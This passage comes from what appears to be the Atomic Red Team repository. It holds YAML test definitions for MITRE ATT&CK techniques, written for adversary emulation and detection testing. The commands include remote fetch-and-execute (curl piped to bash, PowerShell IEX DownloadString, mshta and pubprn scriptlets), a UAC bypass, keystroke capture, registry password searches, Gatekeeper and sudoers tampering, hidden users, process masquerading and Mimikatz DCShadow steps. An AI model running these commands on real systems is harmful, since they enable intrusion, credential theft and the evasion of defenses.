9 | 10 | After sending a keyboard interrupt (CTRL+C) the script will download and execute. 11 | 12 | supported_platforms: 13 | - macos 14 | - centos 15 | - ubuntu 16 | - linux 17 | 18 | executor: 19 | name: sh 20 | command: | 21 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT 22 | exit 23 | trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT 24 | -------------------------------------------------------------------------------- /tests/T1115/T1115.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1115 3 | display_name: Clipboard Data 4 | attack_link: https://attack.mitre.org/wiki/Technique/T1115 5 | 6 | atomic_tests: 7 | - name: Utilize Clipboard to store or execute commands from 8 | description: | 9 | Add data to clipboard to copy off or execute commands from. 
10 | supported_platforms: 11 | - windows 12 | executor: 13 | name: command_prompt 14 | command: | 15 | dir | clip 16 | clip < readme.txt 17 | 18 | - name: PowerShell 19 | description: | 20 | Utilize PowerShell to echo a command to clipboard and execute it 21 | supported_platforms: 22 | - windows 23 | executor: 24 | name: powershell 25 | command: | 26 | echo Get-Process | clip 27 | Get-Clipboard | iex 28 | -------------------------------------------------------------------------------- /tests/T1056/T1056.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1056 3 | display_name: Input Capture 4 | 5 | atomic_tests: 6 | - name: Input Capture 7 | description: | 8 | Utilize PowerShell and external resource to capture keystrokes 9 | [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/Get-Keystrokes.ps1) 10 | Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1) 11 | 12 | supported_platforms: 13 | - windows 14 | 15 | input_arguments: 16 | filepath: 17 | description: Name of the local file, include path. 18 | type: Path 19 | default: c:\key.log 20 | 21 | executor: 22 | name: powershell 23 | command: | 24 | .\Get-Keystrokes.ps1 -LogPath #{filepath} 25 | -------------------------------------------------------------------------------- /tests/T1007/T1007.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1007 3 | display_name: System Service Discovery 4 | tactic: Discovery 5 | description: Adversaries may try to get information about registered services. Commands that may obtain information about services using operating system utilities are "sc," "tasklist /svc" using Tasklist, and "net start" using Net. 
6 | 7 | atomic_tests: 8 | - name: Enumerate system services 9 | description: | 10 | Identify system services cmd 11 | 12 | supported_platforms: 13 | - windows 14 | 15 | executor_cmd: 16 | name: command_prompt 17 | command: | 18 | tasklist.exe /v 19 | sc query 20 | sc query state= all 21 | sc start bthserv 22 | sc stop bthserv 23 | wmic service where displayname="Carbon Black Sensor" get name -------------------------------------------------------------------------------- /tests/T1216/T1216.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1216 3 | display_name: Signed Script Proxy Execution 4 | 5 | atomic_tests: 6 | - name: PubPrn.vbs Signed Script Bypass 7 | description: | 8 | Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload. 9 | 10 | supported_platforms: 11 | - windows 12 | 13 | input_arguments: 14 | remote_payload: 15 | description: A remote payload to execute using PubPrn.vbs. 16 | type: Url 17 | default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct 18 | 19 | executor: 20 | name: command_prompt 21 | command: | 22 | cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}" 23 | -------------------------------------------------------------------------------- /tests/T1030/T1030.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1030 3 | display_name: Data Transfer Size Limits 4 | tactic: Exfiltration 5 | description: An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts. 

atomic_tests:
- name: Data transfer size set to 5 MB
  description: |
    Take a file, split it into 5 MB chunks

  supported_platforms:
    - macos
    - centos
    - ubuntu
    - linux

  executor_nix:
    name: sh
    command: |
      cd /tmp/
      dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
      split -b 5000000 /tmp/victim-whole-file
      ls -l
--------------------------------------------------------------------------------
/tests/T1115/T1115.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1115
display_name: Clipboard Data
tactic: Collection
description: Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.

atomic_tests:
- name: Utilize Clipboard to store or execute commands
  description: |
    Add data to clipboard to copy off or execute commands from.
    Utilize PowerShell to echo a command to clipboard and execute it

  supported_platforms:
    - windows

  executor_man:
    name: command_prompt
    command: |
      dir | clip
      clip < readme.txt

  executor_pwr:
    name: powershell
    command: |
      echo Get-Process | clip
      Get-Clipboard | iex
--------------------------------------------------------------------------------
/tests/T1191/T1191_uacbypass.inf:
--------------------------------------------------------------------------------
[version]
Signature=$chicago$
AdvancedINF=2.5

[DefaultInstall]
RunPreSetupCommands=RunPreSetupCommandsSection
;CopyFiles=Xnstall.CopyFiles, Xnstall.CopyFiles.ICM
;AddReg=Xnstall.AddReg.AllUsers
RegisterOCXs=RegisterOCXSection

[RunPreSetupCommandsSection]
; Commands Here will be run Before Setup Begins to install
c:\windows\system32\cmd.exe
taskkill /IM cmstp.exe /F

[Strings]
ServiceName="MalCorp"
ShortSvcName="malcorp"
DesktopGUID="{BC63D377-66BA-4935-BAD4-DD402D23A85A}"
UninstallAppTitle="MalCorp"
DesktopIcon=""
PhonebookPath=""
BeginPrompt="Do you want to remove MalCorp?"
EndPrompt="Successfully removed MalCorp."
DisplayLCID=1033
CmLCID=1033
--------------------------------------------------------------------------------
/tests/T1214/T1214.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1214
display_name: Credentials in Registry
tactic: Discovery
description: The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.

atomic_tests:
- name: Enumeration for Credentials in Registry
  description: |
    Queries to enumerate for credentials in the Registry.

  supported_platforms:
    - windows

  executor_cmd:
    name: command_prompt
    command: |
      reg query HKLM /f password /t REG_SZ /s
      reg query HKCU /f password /t REG_SZ /s
--------------------------------------------------------------------------------
/tests/T1134/T1134.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1134
display_name: Access Token Manipulation

atomic_tests:
- name: Access Token Manipulation
  description: |
    Creates a process as another user
    Requires Administrator Privileges To Execute Test
  supported_platforms:
    - windows
  input_arguments:
    target_user:
      description: Username To Steal Token From
      type: String
      default: SYSTEM
  executor:
    name: powershell
    command: |
      # List processes by owner
      $owners = @{}
      gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
      get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
      # Steal token
      . .\src\T1134.ps1
--------------------------------------------------------------------------------
/tests/T1057/T1057.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1057
display_name: Process Discovery
tactic: Discovery
description: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.

atomic_tests:
- name: Process Discovery - ps
  description: |
    Utilize ps to identify processes

  supported_platforms:
    - macos
    - centos
    - ubuntu
    - linux

  input_arguments:
    output_file:
      description: path of output file
      type: path
      default: /tmp/loot.txt

  executor_nix:
    name: sh
    command: |
      ps >> #{output_file}
      ps aux >> #{output_file}
--------------------------------------------------------------------------------
/tests/T1147/T1147.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1147
display_name: Hidden Users
tactic: Defense Evasion
description: Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account. There is a property value in /Library/Preferences/com.apple.loginwindow called Hide500Users that prevents users with userIDs 500 and lower from appearing at the login screen.

atomic_tests:
- name: Hidden Users
  description: |
    Add a hidden user on macOS

  supported_platforms:
    - macos

  input_arguments:
    user_name:
      description: username to add
      type: string
      default: APT

  executor_nix:
    name: sh
    command: |
      sudo dscl . -create /Users/#{user_name} UniqueID 333
--------------------------------------------------------------------------------
/tests/T1088/T1088.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1088
display_name: Bypass User Account Control

atomic_tests:
- name: Bypass UAC using Event Viewer
  description: |
    Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification.
    More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

  supported_platforms:
    - windows

  input_arguments:
    executable_binary:
      description: Binary to execute with UAC Bypass
      type: path
      default: C:\Windows\System32\cmd.exe

  executor:
    name: command_prompt
    command: |
      reg.exe add hkcu\software\classes\mscfile\shell\open\command /ve /d "#{executable_binary}" /f
      cmd.exe /c eventvwr.msc
--------------------------------------------------------------------------------
/tests/T1090/T1090.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1090
display_name: Connection Proxy

atomic_tests:
- name: Connection Proxy
  description: |
    Enable traffic redirection.

    To undo changes made by this test:
    unset http_proxy
    unset https_proxy

    Note that this test may conflict with pre-existing system configuration.

  supported_platforms:
    - macos
    - linux

  input_arguments:
    proxy_server:
      description: Proxy server URL (host:port)
      type: url
      default: 127.0.0.1:8080

    proxy_scheme:
      description: Protocol to proxy (http or https)
      type: string
      default: http

  executor:
    name: sh
    command: |
      export #{proxy_scheme}_proxy=#{proxy_server}
--------------------------------------------------------------------------------
/tests/T1010/T1010.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1010
display_name: Application Window Discovery

atomic_tests:
- name: List Process Main Windows - C# .NET
  description: |
    Compiles and executes C# code to list main window titles associated with each process.

  supported_platforms:
    - windows

  input_arguments:
    input_source_code:
      description: Path to source of C# code
      type: path
      default: C:\AtomicRedTeam\atomics\T1010\src\T1010.cs
    output_file_name:
      description: Name of output binary
      type: string
      default: T1010.exe

  executor:
    name: command_prompt
    command: |
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
      #{output_file_name}
--------------------------------------------------------------------------------
/tests/T1170/T1170.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1170
display_name: Mshta
tactic: Defense Evasion, Execution
description: Mshta.exe is a utility that executes Microsoft HTML Applications (HTA) files. Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility.

atomic_tests:
- name: Mshta executes VBScript scriptlet remote payload
  description: |
    Test execution of a remote script using mshta.exe

  supported_platforms:
    - windows

  input_arguments:
    file_url:
      description: location of the payload
      type: Url
      default: http:///T1170.sct

  executor_cmd:
    name: command_prompt
    command: |
      mshta.exe #{file_url}

--------------------------------------------------------------------------------
/tests/T1114/T1114.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1114
display_name: Email Collection
attack_link: https://attack.mitre.org/wiki/Technique/T1114

atomic_tests:
- name: T1114 Email Collection with PowerShell

  description: |
    Search through the local Outlook installation, extract mail, compress the contents, and save everything to a directory for later exfiltration.

  supported_platforms:
    - windows

  executor:
    name: powershell
    command: |
      # Display email contents in the terminal
      .\Get-Inbox.ps1

      # Write emails out to a CSV
      .\Get-Inbox.ps1 -file "mail.csv"

      # Download and execute
      IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Get-Inbox.ps1')
--------------------------------------------------------------------------------
/tests/T1144/T1144.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1144
display_name: Gatekeeper Bypass
tactic: Defense Evasion
description: In macOS and OS X, when applications or programs are downloaded from the internet, there is a special attribute set on the file called com.apple.quarantine. This attribute is read by Apple's Gatekeeper defense program at execution time and provides a prompt to the user to allow or deny execution.

atomic_tests:
- name: Gatekeeper Bypass
  description: |
    Gatekeeper Bypass via command line

  supported_platforms:
    - macos

  input_arguments:
    app_path:
      description: Path to app to be used
      type: Path
      default: myapp.app

  executor_nix:
    name: sh
    command: |
      sudo xattr -r -d com.apple.quarantine #{app_path}
      sudo spctl --master-disable
--------------------------------------------------------------------------------
/tests/T1153/T1153.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1153
display_name: Source

atomic_tests:
- name: Execute Script using Source
  description: |
    Creates a script and executes it using the source command

  supported_platforms:
    - macos
    - linux

  executor:
    name: sh
    command: |
      sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
      chmod +x /tmp/art.sh
      source /tmp/art.sh

- name: Execute Script using Source Alias
  description: |
    Creates a script and executes it using the source command's dot alias

  supported_platforms:
    - macos
    - linux

  executor:
    name: sh
    command: |
      sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh"
      chmod +x /tmp/art.sh
      . /tmp/art.sh

--------------------------------------------------------------------------------
/tests/T1027/T1027.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1027
display_name: Obfuscated Files or Information
tactic: Defense Evasion
description: Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.

atomic_tests:
- name: Obfuscate data
  description: |
    Creates a base64-encoded data file and decodes it into an executable shell script

  supported_platforms:
    - macos
    - linux

  executor_nix:
    name: sh
    command: |
      sh -c "echo ZWNobyBIZWxsbyBmcm9tIHRoZSBBdG9taWMgUmVkIFRlYW0= > /tmp/encoded.dat"
      cat /tmp/encoded.dat | base64 -d > /tmp/art.sh
      chmod +x /tmp/art.sh
      /tmp/art.sh
--------------------------------------------------------------------------------
/tests/T1009/T1009.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1009
display_name: Binary Padding
tactic: Defense Evasion
description: Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.

atomic_tests:
- name: Pad Evil Binary to Change Hash
  description: |
    Copies cat to create an "evil binary" and pads it with a single zero byte to change the hash without harming execution

  supported_platforms:
    - macos
    - linux

  executor_nix:
    name: sh
    command: |
      cp /bin/cat /tmp/evilCat
      md5sum /tmp/evilCat
      dd if=/dev/zero bs=1 count=1 >> /tmp/evilCat
      md5sum /tmp/evilCat
      /tmp/evilCat .bash_profile

--------------------------------------------------------------------------------
/tests/T1046/T1046.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1046
display_name: Network Service Scanning
tactic: Discovery
description: Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system.

atomic_tests:
- name: Port Scan
  description: |
    Scan ports to check for listening ports
    The loop requires bash: brace expansion and /dev/tcp are not available in POSIX sh

  supported_platforms:
    - linux
    - macos

  executor_nix:
    name: sh
    command: |
      for port in {1..65535};
      do
        echo >/dev/tcp/192.168.1.1/$port && echo "port $port is open" || echo "port $port is closed"
      done
      nmap -sS #{network_range} -p #{port}
      telnet #{host} #{port}
      nc -nv #{host} #{port}
--------------------------------------------------------------------------------
/tests/T1086/payloads/mshta.sct:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/tests/T1069/T1069.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1069
display_name: Permission Groups Discovery
tactic: Discovery
description: Adversaries may attempt to find local system or domain-level groups and permissions settings.

atomic_tests:
- name: Enumerate group permissions
  description: |
    Permission Groups Discovery
    Permission Groups Discovery for Windows
    Permission Groups Discovery utilizing PowerShell

  supported_platforms:
    - macos
    - linux
    - windows

  executor_nix:
    name: sh
    command: |
      dscacheutil -q group
      dscl . -list /Groups
      groups

  executor_cmd:
    name: command_prompt
    command: |
      net localgroup
      net group /domain

  executor_pwr:
    name: powershell
    command: |
      Get-LocalGroup
      Get-ADPrincipalGroupMembership #{user} | select name
--------------------------------------------------------------------------------
/tests/T1082/T1082.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1082
display_name: System Information Discovery
tactic: Discovery
description: An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.

atomic_tests:
- name: Enumerate system information
  description: |
    Identify System Info

  supported_platforms:
    - windows
    - linux
    - macos

  executor_cmd:
    name: command_prompt
    command: |
      systeminfo /S localhost /FO LIST
      reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum

  executor_nix:
    name: sh
    command: |
      systemsetup
      system_profiler
      uname -a >> /tmp/loot.txt
      cat /etc/lsb-release >> /tmp/loot.txt
      cat /etc/redhat-release >> /tmp/loot.txt
      uptime >> /tmp/loot.txt
--------------------------------------------------------------------------------
/tests/T1160/T1160.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1160
display_name: Launch Daemon

atomic_tests:
- name: Launch Daemon
  description: |
    TODO

  supported_platforms:
    - macos

  executor:
    name: manual
    steps: |
      1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
      2. Plist keys and values:
         Label: com.example.hello
         ProgramArguments: hello, world
         KeepAlive
--------------------------------------------------------------------------------
/tests/T1135/T1135.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1135
display_name: Network Share Discovery
tactic: Discovery
description: Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

atomic_tests:
- name: Network Share Discovery
  description: |
    Network Share Discovery
    Network Share Discovery utilizing the command prompt
    Network Share Discovery utilizing PowerShell

  supported_platforms:
    - macos
    - linux
    - windows

  executor_nix:
    name: sh
    command: |
      df -aH
      smbutil view -g //#{computer_name}
      showmount #{computer_name}

  executor_cmd:
    name: command_prompt
    command: |
      net view \\#{computer_name}

  executor_pwr:
    name: powershell
    command: |
      get-smbshare -Name #{computer_name}
--------------------------------------------------------------------------------
/tests/T1151/T1151.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1151
display_name: Space After Filename
tactic: Defense Evasion, Execution
description: Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute.

atomic_tests:
- name: Space After Filename
  description: |
    Space After Filename

  supported_platforms:
    - macos

  executor_man:
    name: manual
    steps: |
      1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt

      2. mv execute.txt "execute.txt "

      3. ./execute.txt\ 
--------------------------------------------------------------------------------
/tests/T1207/T1207.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1207
display_name: DCShadow

atomic_tests:
- name: DCShadow - Mimikatz
  description: |
    Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller

    [DCShadow](https://www.dcshadow.com/)
    [Additional Reference](http://www.labofapenetrationtester.com/2018/04/dcshadow.html)

  supported_platforms:
    - windows

  input_arguments:
    output_file:
      description: TODO
      type: todo
      default: TODO

  executor:
    name: manual
    steps: |
      1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
      2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.
      3. lsadump::dcshadow /object:ops-user19$ /attribute:userAccountControl /value:532480
      4. lsadump::dcshadow /push
--------------------------------------------------------------------------------
/tests/T1119/T1119.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1119
display_name: Automated Collection
tactic: Collection
description: Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of Scripting to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals. This functionality could also be built into remote access tools.

atomic_tests:
- name: Automated Collection Command Prompt
  description: |
    Automated Collection

  supported_platforms:
    - windows

  executor_cmd:
    name: command_prompt
    command: |
      dir c: /b /s .docx | findstr /e .docx
      for /R c: %f in (*.docx) do copy %f c:\temp\

  executor_pwr:
    name: powershell
    command: |
      Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
--------------------------------------------------------------------------------
/tests/T1036/T1036.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1036
display_name: Masquerading
tactic: Defense Evasion
description: Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.

atomic_tests:
- name: Masquerading as process
  description: |
    Copies cmd.exe, renames it, and launches it to masquerade as an instance of lsass.exe.
    Copies the sh binary, renames it crond, and executes it to masquerade as the cron daemon.

  supported_platforms:
    - windows
    - linux

  executor_cmd:
    name: command_prompt
    command: |
      cmd.exe /c copy %SystemRoot%\System32\cmd.exe %SystemRoot%\Temp\lsass.exe
      cmd.exe /c %SystemRoot%\Temp\lsass.exe

  executor_nix:
    name: sh
    command: |
      cp /bin/sh /tmp/crond
      /tmp/crond
--------------------------------------------------------------------------------
/tests/T1049/T1049.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1049
display_name: System Network Connections Discovery
tactic: Discovery
description: Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

atomic_tests:
- name: Enumerate network connections
  description: |
    Get a listing of network connections
    System Network Connections Discovery with PowerShell
    System Network Connections Discovery Linux & MacOS

  supported_platforms:
    - windows
    - linux
    - macos

  executor_cmd:
    name: command_prompt
    command: |
      netstat
      net use
      net sessions

  executor_pwr:
    name: powershell
    command: |
      Get-NetTCPConnection

  executor_nix:
    name: sh
    command: |
      netstat
      who -a
--------------------------------------------------------------------------------
/tests/T1217/T1217.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1217
display_name: Browser Bookmark Discovery

atomic_tests:
- name: List Mozilla Firefox Bookmark Database Files on Linux
  description: |
    Searches for Mozilla Firefox's places.sqlite file (on Linux distributions) that contains bookmarks and lists any found instances to a text file.

  supported_platforms:
    - linux

  executor:
    name: sh
    command: |
      find / -path "*.mozilla/firefox/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;

- name: List Mozilla Firefox Bookmark Database Files on macOS
  description: |
    Searches for Mozilla Firefox's places.sqlite file (on macOS) that contains bookmarks and lists any found instances to a text file.

  supported_platforms:
    - macos

  executor:
    name: sh
    command: |
      find / -path "*/Firefox/Profiles/*/places.sqlite" -exec echo {} >> /tmp/firefox-bookmarks.txt \;
--------------------------------------------------------------------------------
/tests/T1206/T1206.todo:
--------------------------------------------------------------------------------
---
attack_technique: T1206
display_name: Sudo Caching

atomic_tests:
- name: Unlimited sudo cache timeout
  description: |
    Sets sudo caching timestamp_timeout to a value for unlimited. This is dangerous to modify without using 'visudo', do not do this on a production system.

  supported_platforms:
    - macos
    - linux

  executor:
    name: sh
    command: |
      sudo sed -i 's/env_reset.*$/env_reset,timestamp_timeout=-1/' /etc/sudoers
      sudo visudo -c -f /etc/sudoers

- name: Disable tty_tickets for sudo caching
  description: |
    Sets sudo caching tty_tickets value to disabled. This is dangerous to modify without using 'visudo', do not do this on a production system.

  supported_platforms:
    - macos
    - linux

  executor:
    name: sh
    command: |
      sudo sh -c "echo Defaults "'!'"tty_tickets >> /etc/sudoers"
      sudo visudo -c -f /etc/sudoers
--------------------------------------------------------------------------------
/tests/T1179/src/T1179/T1179.vcxproj.filters:
--------------------------------------------------------------------------------
Filter definitions (identifier and extension list for each filter):
{4FC737F1-C7A5-4376-A066-2A32D752A2FF}
cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
{93995380-89BD-4b04-88EB-625FBE52EBFB}
h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
Source Files
--------------------------------------------------------------------------------
/tests/T1016/T1016.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1016
display_name: System Network Configuration Discovery
tactic: Discovery
description: Adversaries will likely look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp, ipconfig/ifconfig, nbtstat, and route.

atomic_tests:
- name: Enumerate network configuration
  description: |
    Identify network configuration information

  supported_platforms:
    - windows
    - linux
    - macos

  executor_cmd:
    name: command_prompt
    command: |
      ipconfig /all
      netsh interface show interface
      arp -a
      nbtstat -n
      net config workstation

  executor_nix:
    name: sh
    command: |
      arp -a
      netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c
      ifconfig
--------------------------------------------------------------------------------
/tests/T1156/T1156.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1156
display_name: .bash_profile and .bashrc
tactic: Persistence
description: ~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user.

atomic_tests:
- name: .bash_profile and .bashrc
  description: |
    Appends a script path to ~/.bash_profile and ~/.bashrc so the script runs on every login and every new interactive shell

  supported_platforms:
    - macos
    - linux

  input_arguments:
    script:
      description: path to script
      type: path
      default: /path/to/script.py

  executor_nix:
    name: sh
    command: |
      echo "#{script}" >> ~/.bash_profile
      echo "#{script}" >> ~/.bashrc
--------------------------------------------------------------------------------
/tests/T1047/T1047.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1047
display_name: Windows Management Instrumentation
tactic: Execution
description: Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access.

atomic_tests:
- name: WMI recon users, processes, software

  description: |
    WMI List User Accounts
    WMI Reconnaissance Processes
    WMI Reconnaissance Updates
    WMI Reconnaissance List Remote Services

  supported_platforms:
    - windows

  executor_cmd:
    name: command_prompt
    command: |
      wmic useraccount get /ALL
      wmic process get caption,executablepath,commandline
      wmic qfe get description,installedOn /format:csv
      wmic service where (caption like "%bit9%")

--------------------------------------------------------------------------------
/tests/T1191/T1191.sct:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/tests/T1117/RegSvr32.sct:
--------------------------------------------------------------------------------
--------------------------------------------------------------------------------
/tests/T1124/T1124.yaml:
--------------------------------------------------------------------------------
---
attack_technique: T1124
display_name: System Time Discovery
tactic: Discovery
description: The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network. An adversary may gather the system time and/or time zone from a local or remote system. This information may be gathered in a number of ways, such as with Net on Windows by performing net time \\hostname to gather the system time on a remote system. The victim's time zone may also be inferred from the current system time or gathered by using w32tm /tz.
6 | 7 | atomic_tests: 8 | - name: Enumerate system time 9 | description: | 10 | Identify the system time 11 | Identify the system time via PowerShell 12 | 13 | supported_platforms: 14 | - windows 15 | 16 | executor_cmd: 17 | name: command_prompt 18 | command: | 19 | net time \\localhost 20 | w32tm /tz 21 | 22 | executor_pwr: 23 | name: powershell 24 | command: | 25 | Get-Date 26 | -------------------------------------------------------------------------------- /tests/T1018/T1018.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1018 3 | display_name: Remote System Discovery 4 | tactic: Discovery 5 | description: Adversaries will likely attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system. Functionality could exist within remote access tools to enable this, but utilities available on the operating system could also be used. 6 | 7 | atomic_tests: 8 | - name: Enumerate remote systems 9 | description: | 10 | Identify remote systems 11 | 12 | supported_platforms: 13 | - windows 14 | - linux 15 | - macos 16 | 17 | executor_cmd: 18 | name: command_prompt 19 | command: | 20 | net view /domain 21 | net view 22 | for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i 23 | arp -a 24 | 25 | executor_nix: 26 | name: sh 27 | command: | 28 | arp -a | grep -v '^?' 29 | for ip in $(seq 1 254); do ping -c 1 192.168.1.$ip -o; [ $? 
-eq 0 ] && echo "192.168.1.$ip UP" || : ; done 30 | -------------------------------------------------------------------------------- /tests/T1053/T1053.yaml: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1053 3 | display_name: Scheduled Task 4 | tactic: Execution, Persistence, Privilege Escalation 5 | description: Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. Scheduling a task on a remote system typically required being a member of the Administrators group on the the remote system. 6 | 7 | atomic_tests: 8 | - name: Scheduled tasks 9 | description: | 10 | Scheduled task Local 11 | Scheduled task Remote 12 | 13 | supported_platforms: 14 | - windows 15 | 16 | executor_cmd: 17 | name: command_prompt 18 | command: | 19 | at #{13:20 /interactive cmd} 20 | SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time} 21 | SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time} 22 | -------------------------------------------------------------------------------- /tests/T1191/T1191.todo: -------------------------------------------------------------------------------- 1 | --- 2 | attack_technique: T1191 3 | display_name: CMSTP 4 | 5 | atomic_tests: 6 | - name: CMSTP Executing Remote Scriptlet 7 | description: | 8 | Adversaries may supply CMSTP.exe with INF files infected with malicious commands 9 | 10 | supported_platforms: 11 | - windows 12 | input_arguments: 13 | inf_file_path: 14 | description: Path to the INF file 15 | type: path 16 | default: T1191.inf 17 | 18 | executor: 19 | name: command_prompt 20 | command: | 21 | cmstp.exe /s #{inf_file_path} 22 | 23 | - name: CMSTP Executing UAC 
